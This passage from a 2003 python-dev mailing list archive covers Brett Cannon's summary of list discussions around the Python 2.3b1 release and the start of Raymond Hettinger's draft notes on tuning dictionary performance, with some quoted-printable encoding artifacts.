because you can hack config.c (which you can get from
$prefix/lib/pythonx.x/config/config.c)
and in fact many people did exactly that but it made for a messy
extension until the API call made it clean and direct.

You don't need Py_AtExit() because you can call through to
atexit.register() to put the function in.

The list goes on...

I still think that Py_AtInit() is clean, symmetric with Py_AtExit(),
and solves a big problem for extenders who wish to address
localization from within C (as opposed to sitecustomize.py).

This is a 10 line patch with 0 runtime impact
that requires no maintanence to move forward with new versions.
If it were more than that, I could better understand your objections.

Hope that I can get you to at least vote 0 instead of -1.

Cheers,

Pat



-- 
Patrick Miller | (925) 423-0309 |
http://www.llnl.gov/CASC/people/pmiller

You can never solve a problem on the level on which it was created.
-- Albert Einstein, physicist, Nobel laureate (1879-1955)


From guido@python.org  Thu May  1 17:32:31 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 01 May 2003 12:32:31 -0400
Subject: [Python-Dev] Re: Python-Dev digest, Vol 1 #3221 - 4 msgs
In-Reply-To: Your message of "Thu, 01 May 2003 10:59:41 CDT."
 <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>
References: <EB0B6712-7BED-11D7-B27C-000393C9700E@twistedmatrix.com>
Message-ID: <200305011632.h41GWVu08466@odiug.zope.com>

Apologies accepted, Glyph.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Fri May  2 00:22:34 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Thu, 1 May 2003 16:22:34 -0700 (PDT)
Subject: [Python-Dev] python-dev Summary for 2003-04-16 through 2003-04-30
Message-ID: <Pine.SOL.4.55.0305011619340.20468@death.OCF.Berkeley.EDU>

Yes, I am actually getting the rough draft out the day after its coverage
ends.  Perk of being done with grad school apps.  =3D)

You guys have until Sunday (busy Friday and Saturday) to show me why I
should try proof-reading one of these days.  =3D)

And I did leave the one thread out that Guido asked not to be spread
around so I guess this summary is not as "complete" as previous ones.

--------------------------------

+++++++++++++++++++++++++++++++++++++++++++++++++++++
python-dev Summary for 2003-04-16 through 2003-04-30
+++++++++++++++++++++++++++++++++++++++++++++++++++++

This is a summary of traffic on the `python-dev mailing list`_ from April
16, 2003 through April 30, 2003.  It is intended to inform the wider
Python community of on-going developments on the list and to have an
archived summary of each thread started on the list.  To comment on
anything mentioned here, just post to python-list@python.org or
`comp.lang.python`_ with a subject line mentioning what you are
discussing. All python-dev members are interested in seeing ideas
discussed by the community, so don't hesitate to take a stance on
something.  And if all of this really interests you then get involved and
join `python-dev`_!

This is the sixteenth summary written by Brett Cannon (writing history the
way I see fit  =3D).

All summaries are archived at http://www.python.org/dev/summary/ .

Please note that this summary is written using reStructuredText_ which can
be found at http://docutils.sf.net/rst.html .  Any unfamiliar punctuation
is probably markup for reST_ (otherwise it is probably regular expression
syntax or a typo =3D); you can safely ignore it, although I suggest learnin=
g
reST; its simple and is accepted for `PEP markup`__.  Also, because of the
wonders of programs that like to reformat text, I cannot guarantee you
will be able to run the text version of this summary through Docutils_
as-is unless it is from the original text file.

__ http://www.python.org/peps/pep-0012.html

=2E. _python-dev: http://www.python.org/dev/
=2E. _python-dev mailing list:
http://mail.python.org/mailman/listinfo/python-dev
=2E. _comp.lang.python: http://groups.google.com/groups?q=3Dcomp.lang.pytho=
n
=2E. _Docutils: http://docutils.sf.net/
=2E. _reST:
=2E. _reStructuredText: http://docutils.sf.net/rst.html

=2E. contents::


=2E. _last summary:
http://www.python.org/dev/summary/2003-04-01_2003-04-15.html

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Summary Announcements
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
So no one responded to my question last time about whether anyone cared if
I stopped linking to files in the Python CVS online through ViewCVS.  So
silence equals what ever answer makes my life easier, so I won't link to
files anymore.

=2E. _ViewCVS: http://viewcvs.sf.net/

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
`2.3b1 release`__
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
__ http://mail.python.org/pipermail/python-dev/2003-April/034682.html

Splinter threads:
    - `Masks in getargs.c
<http://mail.python.org/pipermail/python-dev/2003-April/034693.html>`__
    - `CALL_ATTR patch
<http://mail.python.org/pipermail/python-dev/2003-April/034712.html>`__
    - `Built-in functions as methods
<http://mail.python.org/pipermail/python-dev/2003-April/034749.html>`__
    - `Tagging the tree
<http://mail.python.org/pipermail/python-dev/2003-April/035069.html>`__
    - `RELEASED: Python 2.3b1
<http://mail.python.org/pipermail/python-dev/2003-April/035093.html>`__

Guido announced he wanted to get `Python 2.3b1`_ out the door by Friday,
April 25 (which he did).  He also said if something urgently needed to get
in before then to set the priority on the item to 7.

The rules for betas is you can apply bug fixes (it is the point of the
releases).  New unit tests can also be added as long as the entire
regression testing suite passes with them in there; since this is a beta
any bugs found should be patched along with adding the tests.

This led to some patches to come up that some people would like to see get
into b1.  One is Thomas Heller and his patch at
http://www.python.org/sf/595026 which adds new argument masks for
PyArg_ParseTuple().  Thomas' patch adds two new masks ('k' and 'K') and
modifies some others so that their range checking (if they kept any) were
more reasonable.

This is when Jack Jansen chimed in saying that he didn't notice any mask
that worked between 2.2 and 2.3 that converts 32 bit values without
throwing a fit.  Basically the changes to the 'h' mask left all of the Mac
modules broken.  The change was backed out, though, and the issue was
solved.

Martin v. L=C3=B6wis wanted to get IDNA (International Domain Name Addressi=
ng)
in (which he did).

UnixWare was (and as of this writing still is) broken.  It's being worked
on, though, by Tim Rice.

The CALL_ATTR patch that Thomas Wouters and I worked on at PyCon came up.
We were trying to come up with an opcode to replace the common
``LOAD_ATTR; CALL_FUNCTION`` opcode pair that happens whenever you call a
method.  The hope was to short-circuit the pushing on to the stack the
method object since it gets popped off immediately by CALL_FUNCTION.
Initially the patch only worked for classic classes but Thomas has since
cleaned it up and added support for new-style classes.

To help out Thomas, Guido gave an overview of new-style classes and how
descriptors work.  Basically a descriptor is what exists in a class'
__dict__ and "primarily affects instance attribute lookup".  When the
attribute lookup finds the descriptor it wants, it calls its __get__
method (tp_descrget slot for C types).  The lookup then "binds" this to
the instance; this is what separates a bound method from a function since
functions are also descriptors.  Properties are just descriptors whose
__get__ calls whatever you passed for the fget argument.  Class attribute
lookup also calls __get__ but the instance attribute is made None (or NULL
for C code).  __set__ is called on a descriptor for instance attribute
assignment but not for class attribute assignment.

Guido clarified this later somewhat by the example having a descriptor f
that when ``f.__get__(obj)`` is called it returns a function g which acts
like a curried function (read the Python Cookbook if you don't know what
currying_ is).  Now when you call ``g(arg1, ...)`` you are basically doing
``f(obj, arg1, ...)``; so this all turns into ``f.__get__(obj)(arg1,
=2E..)``.

The problem with the CALL_ATTR patch is that there is turning out to be
zero benefit from it beyond from having a nicer opcode for a common
operation when the code for working with new-style classes in the code.
This could be from cache misses because of the increased size of the
interpreter loop or just too many branches to possibly take.  As of now
the patch is still on SF and has not been applied.

=2E. _Python 2.3b1: http://www.python.org/2.3/
=2E. _currying:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/52549



=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
`Super and properties`__
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
__ http://mail.python.org/pipermail/python-dev/2003-April/034338.html

This thread was initially covered in the `last summary`_.

Guido ended up explaining why super() does not work for properties.
super() does not stop on the first hit of finding something when that
"something" is a data descriptor; it ignores it and just keeps on looking.
Now super() does this so that it doesn't end up looking like something it
isn't.  Think of the case of __class__; if it returned what object's
__class__ returned it would cause super to look like something it isn't.
Guido figured people wouldn't want to override data descriptors anyway, so
this made sense.

But now there is a use case for this, so Guido is changing this for Python
2.3 so that data descriptors are properly hit in the inheritance chain by
super().


=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
`Final PEP 311 run`__
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
__ http://mail.python.org/pipermail/python-dev/2003-April/034705.html

Mark Hammond's `PEP 311`_ has now been implemented!  What Mark has done is
implement two functions in C; PyGILState_Ensure() and
PyGILState_Restore().  Call the first one to get control of the GIL,
without having to know its current state, to allow you to use the Python
API safely.  The second releases the GIL when you are done making calls
out to Python.  This is a much simpler interface than what was previously
needed when you did not need a very fancy threading interface with Python
and just needed to hold the GIL.

As always, read the PEP to get the full details.

=2E. _PEP 311: http://www.python.org/peps/pep-0311.html

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
`summing a bunch of numbers (or "whatevers")`__
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
__ http://mail.python.org/pipermail/python-dev/2003-April/034767.html

Splinter threads:
    - `stats.py
<http://mail.python.org/pipermail/python-dev/2003-April/034840.html>`__
    - `''.join() again
<http://mail.python.org/pipermail/python-dev/2003-April/034857.html>`__

How would use sum a list of numbers?  Traditionally there have been two
answers.  One is to use the operator module and 'reduce' in the idiomatic
``reduce(operator.add, list_of_numbers)``.  The other is to do a simple
loop::

  running_sum =3D 0
  for num in list_of_numbers:
      running_sum +=3D num

Common complaints against the 'reduce' solution are that is just is ugly.
People don't like the loop solution because it is long for such a simple
operation.  And a knock against both is that new users of Python do not
necessarily think of either solution initially.  So, what to do?

Well, Alex Martelli to the rescue.  Alex proposed adding a new built-in,
'sum', that would take a list of numbers and return the sum of those
numbers.  Originally Alex also wanted to special-case the handling of a
list of strings so as to prevent having to tell new Python programmers
that ``"".join(list_of_strings)`` is the best way to concatenate a bunch
of strings and that looping over them is *really* bad (the amount of I/O
done in the loop kills performance).  But this special-casing was shot
down because it seemed rather magical and can still be taught to beginners
easily enough ('reduce' tends to require an understanding of functional
programming).

But the function still got added for numbers.  So, as of Python 2.3b1,
there is a built-in named 'sum' that has the parameter list
"sum(list_of_numbers [, start=3D0]) -> sum of the numbers in
list_of_numbers".  The 'start' parameter allows you to specify where to
start in the list for your running sum.  And since this is a function with
a very specific use it is the fastest way you can sum a list of numbers.

The question of adding a statistics module came up during this discussion.
The thought was presented to come up with a good, basic stats module to
have in the stdlib.    The arguments against this is that there are
already several good stats modules out there so why bother with including
one with Python?  It would cause some overshadowing of any 3rd-party stats
modules.  Eventually the "nays" had it and the idea was dropped.

And for all his work Alex got CVS commit privileges.  Python, the gift
that keeps on giving you more responsibility.  =3D)

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
`When is it okay to cvs remove?`__
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
__ http://mail.python.org/pipermail/python-dev/2003-April/035011.html

Related threads:
    - `Rules of a beta release?
<http://mail.python.org/pipermail/python-dev/2003-April/035092.html>`__

Being probably the most inexperienced person with CVS commit privileges on
Python, I am continuing with my newbie questions in terms of applying
patches to the CVS tree (and since I control the Summary I am going to
document the answers I get here so I don't have to write them down
somewhere else  =3D).  This time I asked about when it was appropriate to
use ``cvs remove``, specifically if it was reasonable if a file was
completely rewritten.

The answer was to not bother with it unless you are actually removing the
file forever; don't bother if you are just rewriting the file.  Also,
don't bother with changing the version number when doing a complete
rewrite; just make sure to mention in the CVS commit message that it is a
rewrite.

I also learned that the basic guideline to follow in terms of whether a
patch should be put up on SF_ or just committed directly is that if you
are unsure about the usefulness or correctness then you should post it on
SF.  But if you don't think there is anyone who can answer it on SF it
will just languish there for eternity.

Also learned the rules of a beta release.  Basically no changes that would
cause someone's code to not work the same way as when the beta was
released can be checked in.  New tests are okay, though.

=2E. _SF: http://www.sf.net/

=3D=3D=3D=3D=3D=3D=3D=3D=3D
Quickies
=3D=3D=3D=3D=3D=3D=3D=3D=3D
`3-way result of PyObject_IsTrue() considered PITA`__
    Raymond Hettinger discovered that PyObject_IsTrue() promises that
there is never an error from running the function, which is not how the
function performs.  Raymond fixed the docs to match the code.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034658.html

`Python dies upon printing UNICODE using UTF-8`__
    Windows NT 4's support of UTF-8 is broken.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034666.html

`shellwords`__
    Gustavo Niemeyer asked if there was any chance of getting shellwords_
into the stdlib so as to be able to have POSIX command line word parsing.
The basic response was that shlex_ should be enhanced to do what Gustavo
wanted.  He has since written `patch #722686`_ that implements the
features he wanted.  It was also discovered that
distutils.util.split_quoted comes close.  If someone wants to document
Distutils utilities it would be greatly appreciated.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034670.html
=2E. _shellwords: http://www.crazy-compilers.com/py-lib/shellwords.html
=2E. _shlex: http://www.python.org/dev/doc/devel/lib/module-shlex.html
=2E. _patch #722686: http://www.python.org/sf/722686

`Changes to gettext.py for Python 2.3`__
    This thread was originally covered in the `last summary`_.  Barry
Warsaw and Martin v. L=C3=B6wis discussed the gettext_ and whether there
should be a way to coerce strings to other encodings.  They ended up
agreeing on defaulting on Unicode for storing the strings and having
=2Egettext() coerce to an 8-bit string while .ugettext() returns the
original Unicode string.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034511.html
=2E. _gettext: http://www.python.org/dev/doc/devel/lib/module-gettext.html

`Stackless 3.0 alpha 1 at blinding speed`__
    Christian Tismer has done it again; he improved Stackless_ and now has
managed to have merged the abilities of Stackless 1 with 2 which has led
to 3a.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034708.html
=2E. _Stackless: http://www.stackless.com

`Build errors under RH9`__
    Python was not building under Red Hat 9, but Martin v. L=C3=B6wis check=
ed
in a fix.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034724.html

`Wrappers and keywords`__
    Matt LeBlanc asked why there wasn't a nice syntax for doing properties
staticmethods and classmethods.  The answer is that it was felt it was
more important to get the ability to use those new descriptors out there
instead of letting a syntax debate hold them up.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034715.html

`Startup overhead due to codec usage`__
    MA Lemburg and Martin v. L=C3=B6wis discussed startup time taken up by
seeing what encoding is used by the local filesystem.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034742.html

`test_pwd failing`__
    Initially covered in the `last summary`_.  test_grp was failing for
the same reasons test_pwd was failing.  It has been fixed.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034626.html

`Evil setattr hack`__
    Don't mess with an instance's __dict__ directly; we will let you but
if you get burned its your own fault.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034633.html

`heapq`__
    Splinter threads:
      - `FIFO data structure?
<http://mail.python.org/pipermail/python-dev/2003-April/034790.html>`__
      - `heaps
<http://mail.python.org/pipermail/python-dev/2003-April/035004.html>`__

    The idea of turning the heapq_ module into a class came up, and later
led to the idea of having a more proper FIFO (First In, First Out) data
structure.  Both ideas were shot down.  The reason for this was that the
stdlib does not need to try to grow every single possible data structure
in programming.  Guido's design philosophy is to have a few very powerful
data structures that other ones can be built off of.  This is why the
bisect_ and heapq modules just work on standard lists instead of defining
a new class.  Queue_ is an exception, but it is designed to mediate
messages between threads instead of being a general implementation of a
queue.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034768.html
=2E. _heapq: http://www.python.org/dev/doc/devel/lib/module-heapq.html
=2E. _bisect: http://www.python.org/dev/doc/devel/lib/module-bisect.html
=2E. _Queue: http://www.python.org/dev/doc/devel/lib/module-Queue.html

`New re failures on Windows`__
    Splinter threads:
      - `sre vs gcc
<http://mail.python.org/pipermail/python-dev/2003-April/034895.html>`__

    The re_ module was failing after some changes were made to it.  The
pain of it all was that it was failing only on certain platforms running
gcc_.  Initial attempts were to make it "just work", but then it was
stressed that it is more important to find the offending C code and figure
out why gcc on certain platforms was compiling bad assembly.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034776.html
=2E. _re: http://www.python.org/dev/doc/devel/lib/module-re.html
=2E. _gcc: http://gcc.gnu.org/

`os.path.walk() lacks 'depth first' option`__
    Someone requested that os.path.walk support depth-first walking.  The
request was deemed not important enough to bother implementing, but Tim
Peters did implement a new function named os.walk that is a much improved
replacement for os.path.walk.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034792.html

`Weekly Python Bug/Patch Summary`__
    Skip Montanaro's weekly reminder that there is work to be done!
Summary for week 2 can be found `here
<http://mail.python.org/pipermail/python-dev/2003-April/035125.html>`__.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034797.html

`Hook Extension Module Import?`__
    Want to do something that requires a special import hook in C?  Then
override the __import__ built-in with what you need.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034804.html

`Bug/feature/patch policy for optparse.py`__
    Greg Ward asked if it would be okay to keep the official version of
optparse_ at http://optik.sf.net/ .  Guido said sure.  The justification
for this is that Greg wants Optik to be available to people for use in
earlier versions of Python.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034833.html
=2E. _optparse: http://www.python.org/dev/doc/devel/lib/module-optparse.htm=
l

`LynxOS4 dynamic loading with dlopen() and -ldl`__
    LynxOS4 does not like dynamic linking.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034878.html

`Embedded python on Win2K, import failures`__
    I don't like Windows.  And no, this has nothing to do with this single
email that is a short continuation of one covered in the `last summary`_.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034506.html

`New thread death in test_bsddb3`__
    After Mark Hammond's new thread code got checked in the bsddb module
broke.  Mark went in, though, and using the wonders that is the C
preprocessor and NEW_PYGILSTATE_API_EXISTS, Mark fixed the code to use the
new PyGILState API as covered in `PEP 311`_ when possible and to use the
old solution when needed.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034901.html

`Magic number needs upgrade`__
    Guido noticed that the PYC magic number needed to be incremented to
handle Raymond Hettinger's new bytecode optimizations.  But then Guido
questioned the need of Raymond's changes.  Basically Raymond's changes
didn't speed anything up but cleaned up the emitted bytecode.  Guido
didn't like the idea of adding more code without an actual speed
improvement.  Since neither this code nor any of the other proposed
speedup changes (CALL_ATTR and caching attribute lookup results) are
panning out, Guido questioned why Raymond's should get in.  Guido
suggested rewriting the interpreter from scratch since all new changes
seem to be breaking some delicate balance that has developed in it.  He
also thought putting effort into other things like pysco_.  Eventually
Raymond's changes were backed out.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034905.html
=2E. _pysco: http://psyco.sf.net/

`draft PEP: Trace and Profile Support for Threads`__
    Jeremy Hylton has a draft PEP on how to add hooks for profile and
trace code in threads.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034909.html

`Data Descriptors on module objects`__
    Never going to happen.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035025.html

`Metatype conflict among bases?`__
    "The metaclass [of a class] must be a subclass of the metaclass of all
the bases" of that class.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034910.html

`okay to beef up tests on the maintenance branch?`__
    Answer: yes!

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034939.html

`Cryptographic stuff for 2.3`__
    AM Kuchling wanted to add an implementation of the AES_ encryption
algorithm to the stdlib.  After a long discussion the idea was shot down
because having crypto that strong in the stdlib would cause export issues
for Python.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034957.html
=2E. _AES: http://csrc.nist.gov/encryption/aes/

`vacation`__
    Neal Norwitz is on vacation from April 26 till May 6.  He pointed out
some nagging errors coming up from the `Snake Farm`_ that could use some
working on.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034942.html
=2E. _Snake Farm: http://www.lysator.liu.se/xenofarm/python/latest.html

`test_getargs2 failures`__
    Not anymore.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034944.html

`Democracy`__
    Guido pointed out a paper on democracy (in the ancient Athenian sense)
and the organization of groups at
http://www.acm.org/ubiquity/interviews/b_manville_1.html that was
interesting.  Sparked some discussion on proper comparisons to open source
projects and such.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034946.html

`Updating PEP 246 for type/class unification, 2.2+, etc.`__
    Phillip Eby proposed some changes to `PEP 246`_.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034955.html
=2E. _PEP 246: http://www.python.org/peps/pep-0246.html

`why is test_socketserver in expected skips?`__
    Skip Montanaro noticed that socketserver was listed as an expected
test to be skipped on all platforms sans os2emx even though it works on
all platforms with networking (basically all of them).  So it was removed
from the expected skip list.  Skip also tweaked test_support.requires to
always pass when the caller is __main__.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034973.html

`netrc.py`__
    Bram Moolenaar, author of the `greatest editor in the world`_ and
AAP_, requested a changed to netrc_ that got implemented.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034983.html
=2E. _greatest editor in the world: http://www.vim.org/
=2E. _AAP: http://www.a-a-p.org/
=2E. _netrc: http://www.python.org/dev/doc/devel/lib/module-netrc.html

`PyRun_* functions`__
    They take FILE* arguments and it is going to stay that way.  Just make
sure the files are opened with the same library as being built against.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034990.html

`Python Developers`__
    Related threads:
      - `Getting mouse position interms of canvas unit.
<http://mail.python.org/pipermail/python-dev/2003-April/035149.html>`__
      - `2.3b1, and object()
<http://mail.python.org/pipermail/python-dev/2003-April/035210.html>`__

    Posted to the wrong email list.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/034969.html

`New test failure on Windows`__
    re_ was failing but got fixed.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035009.html

`More new Windos test failures`__
    Just before `Python 2.3b1`_ got pushed out the door, some last-minute
test failures cropped up (some of them were my fault).  But they got
fixed.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035047.html

`should sre.Scanner be exposed through re and documented?`__
    re.Scanner shall remain undocumented.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035066.html

`LynxOS4 port: need pre-ncurses curses!`__
    The LynxOS is hoping curses will go away.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035052.html

`test_s?re merge`__
    test_re and test_sre have been merged and moved over to unittest_
thanks to Skip Montanaro.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035067.html
=2E. _unittest: http://www.python.org/dev/doc/devel/lib/module-unittest.htm=
l

`test_ossaudiodev hanging again`__
    Some people are still having issues with ossaudiodev tests hanging.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035056.html

`bz2 module fails to compile on Solaris 8`__
    The joys of being cross-platform.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035068.html

`test_logging hangs on Solaris 8`__
    Splinter threads:
      - `test_logging hangs on OS X
<http://mail.python.org/pipermail/python-dev/2003-April/035135.html>`__
      - `test_logging hangs on Solaris 8 (and 9)
<http://mail.python.org/pipermail/python-dev/2003-April/035100.html>`__

    The joys of threading and trying to avoid deadlock.  A fix has been
checked in that seems to fix this on OS X; don't know about Solaris yet.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035065.html

`Python 2.3b1 documentation`__
    Fred L. Drake, Jr. posted the documentation for Python 2.3b1.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035064.html

`Accepted PEPs?`__
    Splinter threads:
      - `Reminder to PEP authors
<http://mail.python.org/pipermail/python-dev/2003-April/035109.html>`__
      - `proposed amendments to PEP 1
<http://mail.python.org/pipermail/python-dev/2003-April/035161.html>`__

    The status of some PEPs got updated=C2=A0along with some proposed chang=
es
to `PEP 1`_.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035104.html
=2E. _PEP 1: http://www.python.org/peps/pep-0001.html

`Problems w/ Python 2.2-maint and Redhat 9`__
    Dealing with some issues of Python 2.2-maint and linking against a
dbm.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035120.html

`Why doesn't the uu module give you the filename?`__
     Someone wanted the uu_ module to let you know what the name of the
encoded file is.  Was told to post a patch.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035129.html
=2E. _uu: http://www.python.org/dev/doc/devel/lib/module-uu.html

`Antigen found CorruptedCompressedUuencodeFile virus`__
    The joys of having to watch out for viruses in emails and get false
positives.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035130.html

`Python 2.3b1 has 20% slower networking?`__
    Splinter threads:
      - `Python-Dev digest, Vol 1 #3221 - 4 msgs
<http://mail.python.org/pipermail/python-dev/2003-April/035153.html>`__

    Networking throughput did not have as high of a max when in a loop as
before.  Has been fixed, though.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035132.html

`cvs socketmodule.c and IPV6 disabled`__
    Discovered some code that couldn't compile because a test for a
specific C function was not specific enough.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035146.html

`Introduction :)`__
    Someone else with the first name of Brett introduced themselves to the
list (Brett Kelly).  You can tell us apart because I am taller.  =3D)

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035162.html

`Dictionary tuning`__
    Splinter threads:
      - `Dictionary tuning upto 100,000 entries
<http://mail.python.org/pipermail/python-dev/2003-April/035194.html>`__

    Raymond Hettinger did a bunch of attempted tuning of dictionary
accesses and came up with one solution that managed to be beneficial for
large dictionaries and not detrimental for small ones.  He basically just
caused dictionary sizes to grow by a factor of 4 instead of 2 so as to
lower the number of collisions.  The objection that came up was that some
dictionaries would be larger than they were previously.  It looks like it
would be applied, but Raymond's notes on everything will most likely end
up as a text file in Python.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035151.html

`Thoughts on -O`__
    It was suggested to change what the -O and -OO command-line switches
did since at this moment they don't do much (Guido has even suggested
eliminating -O).  But the discussion has been partially put on hold until
development for Python 2.4 starts.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035165.html

`Initialization hook for extenders`__
    It has been suggested to add a Py_AtInit() hook to Python to be
symmetric with Py_AtExit().  The debate over this is still going.

=2E. __: http://mail.python.org/pipermail/python-dev/2003-April/035226.html




From Raymond Hettinger" <python@rcn.com  Fri May  2 06:24:05 2003
From: Raymond Hettinger" <python@rcn.com (Raymond Hettinger)
Date: Fri, 2 May 2003 01:24:05 -0400
Subject: [Python-Dev] Draft of dictnotes.txt  [Please Comment]
Message-ID: <000901c3106b$0d549d20$125ffea9@oemcomputer>

NOTES ON OPTIMIZING DICTIONARIES
================================


Principal Use Cases for Dictionaries
------------------------------------

Passing keyword arguments
    Typically, one read and one write for 1 to 3 elements.
    Occurs frequently in normal python code.

Class method lookup
    Dictionaries vary in size with 8 to 16 elements being common.
    Usually written once with many lookups.
    When base classes are used, there are many failed lookups
        followed by a lookup in a base class.

Instance attribute lookup and Global variables
    Dictionaries vary in size.  4 to 10 elements are common.
    Both reads and writes are common.

Builtins
    Frequent reads.  Almost never written.
    Size 126 interned strings (as of Py2.3b1).
    A few keys are accessed much more frequently than others.

Uniquification
    Dictionaries of any size.  Bulk of work is in creation.
    Repeated writes to a smaller set of keys.
    Single read of each key.

    * Removing duplicates from a sequence.
        dict.fromkeys(seqn).keys()
    * Counting elements in a sequence.
        for e in seqn:  d[e]=d.get(e,0) + 1
    * Accumulating items in a dictionary of lists.
        for k, v in itemseqn:  d.setdefault(k, []).append(v)

Membership Testing
    Dictionaries of any size.  Created once and then rarely changes.
    Single write to each key.
    Many calls to __contains__() or has_key().
    Similar access patterns occur with replacement dictionaries
        such as with the % formatting operator.


Data Layout (assuming a 32-bit box with 64 bytes per cache line)
-----------------------------------------------------------

Smalldicts (8 entries) are attached to the dictobject structure
and the whole group nearly fills two consecutive cache lines.

Larger dicts use the first half of the dictobject structure (one cache
line) and a separate, continuous block of entries (at 12 bytes each
for a total of 5.333 entries per cache line).


Tunable Dictionary Parameters
-----------------------------

* PyDict_MINSIZE.  Currently set to 8.
    Must be a power of two.  New dicts have to zero-out every cell.
    Each additional 8 consumes 1.5 cache lines.  Increasing improves
    the sparseness of small dictionaries but costs time to read in
    the additional cache lines if they are not already in cache.
    That case is common when keyword arguments are passed.

* Maximum dictionary load in PyDict_SetItem.  Currently set to 2/3.
    Increasing this ratio makes dictionaries more dense resulting
    in more collisions.  Decreasing it, improves sparseness at the
    expense of spreading entries over more cache lines and at the
    cost of total memory consumed.

    The load test occurs in highly time sensitive code.  Efforts
    to make the test more complex (for example, varying the load
    for different sizes) have degraded performance.

* Growth rate upon hitting maximum load.  Currently set to *2.
    Raising this to *4 results in half the number of resizes,
    less effort to resize, better sparseness for some (but not
    all dict sizes), and potentially double memory consumption
    depending on the size of the dictionary.  Setting to *4
    eliminated every other resize step.

Tune-ups should be measured across a broad range of applications and
use cases.  A change to any parameter will help in some situations and
hurt in others.  The key is to find settings that help the most common
cases and do the least damage to the less common cases.  Results will
vary dramatically depending on the exact number of keys, whether the
keys are all strings, whether reads or writes dominate, the exact
hash values of the keys (some sets of values have fewer collisions than
